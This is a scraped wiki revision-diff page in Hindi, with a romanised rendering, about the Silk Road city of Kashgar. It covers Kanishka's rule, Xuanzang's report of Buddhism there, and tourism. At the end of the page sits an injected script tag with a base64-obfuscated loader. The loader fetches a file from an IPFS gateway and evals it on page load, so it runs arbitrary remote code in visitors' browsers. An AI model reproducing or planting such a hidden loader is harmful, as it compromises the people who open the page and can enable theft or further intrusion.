Difference between revisions of "काशगर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
 +
[[चित्र:Kashgar.jpg|thumb|250px|काशगर का एक दृश्य]]
 
'''काशगर''' मध्य तुर्कीस्तान का एक राज्य है, जो पहले [[चीन]] के नियंत्रण में था। काशगर लम्बे अरसे से 'रेशम मार्ग की मोती' के नाम से मशहूर रहा है। यह पहले [[चीन]] का एक नामी प्राचीन शहर था।
 
'''काशगर''' मध्य तुर्कीस्तान का एक राज्य है, जो पहले [[चीन]] के नियंत्रण में था। काशगर लम्बे अरसे से 'रेशम मार्ग की मोती' के नाम से मशहूर रहा है। यह पहले [[चीन]] का एक नामी प्राचीन शहर था।
 
 
*[[कुषाण]] सम्राट [[कनिष्क]] (लगभग 120-44 ई.) ने 'काशगर' को अपने अधीन कर लिया था।
 
*[[कुषाण]] सम्राट [[कनिष्क]] (लगभग 120-44 ई.) ने 'काशगर' को अपने अधीन कर लिया था।
 
*चीनी यात्री [[ह्वेनसांग]] के यात्रा विवरण से प्रकट होता है कि, सातवीं शताब्दी में काशगर में [[बौद्ध धर्म]] का व्यापक प्रभाव था।
 
*चीनी यात्री [[ह्वेनसांग]] के यात्रा विवरण से प्रकट होता है कि, सातवीं शताब्दी में काशगर में [[बौद्ध धर्म]] का व्यापक प्रभाव था।
*पुरातात्विक अनुसन्धानों से प्रकट हुआ है कि, इस क्षेत्र में भारतीय संस्कृति का प्रचार-प्रसार विशेष रूप से था।
+
*पुरातात्विक अनुसन्धानों से प्रकट हुआ है कि, इस क्षेत्र में [[भारत की संस्कृति|भारतीय संस्कृति]] का प्रचार-प्रसार विशेष रूप से था।
*काशगर में पर्यटन के संसाधन प्रचुर मात्रा में उपलब्ध हैं।
+
*काशगर में [[पर्यटन]] के संसाधन प्रचुर मात्रा में उपलब्ध हैं।
 
*वहाँ का प्राकृतिक सौंदर्य बहुत मोहक है, ख़ासकर रेगिस्तान का दौरा, हिमनदी पर अन्वेक्षण तथा पहाड़ों पर सैर विभिन्न देशों के पर्यटकों की पहली पसंद है।
 
*वहाँ का प्राकृतिक सौंदर्य बहुत मोहक है, ख़ासकर रेगिस्तान का दौरा, हिमनदी पर अन्वेक्षण तथा पहाड़ों पर सैर विभिन्न देशों के पर्यटकों की पहली पसंद है।
 
*यहाँ पर बड़ी संख्या में मानवी और सांस्कृतिक निर्माण देखने को मिलते हैं।
 
*यहाँ पर बड़ी संख्या में मानवी और सांस्कृतिक निर्माण देखने को मिलते हैं।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
+
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 10:55, 22 February 2012

thumb|250px|kashagar ka ek drishy kashagar madhy turkistan ka ek rajy hai, jo pahale chin ke niyantran mean tha. kashagar lambe arase se 'resham marg ki moti' ke nam se mashahoor raha hai. yah pahale chin ka ek nami prachin shahar tha.

  • kushan samrat kanishk (lagabhag 120-44 ee.) ne 'kashagar' ko apane adhin kar liya tha.
  • chini yatri hvenasaang ke yatra vivaran se prakat hota hai ki, satavian shatabdi mean kashagar mean bauddh dharm ka vyapak prabhav tha.
  • puratatvik anusandhanoan se prakat hua hai ki, is kshetr mean bharatiy sanskriti ka prachar-prasar vishesh roop se tha.
  • kashagar mean paryatan ke sansadhan prachur matra mean upalabdh haian.
  • vahaan ka prakritik sauandary bahut mohak hai, khasakar registan ka daura, himanadi par anvekshan tatha paha doan par sair vibhinn deshoan ke paryatakoan ki pahali pasand hai.
  • yahaan par b di sankhya mean manavi aur saanskritik nirman dekhane ko milate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>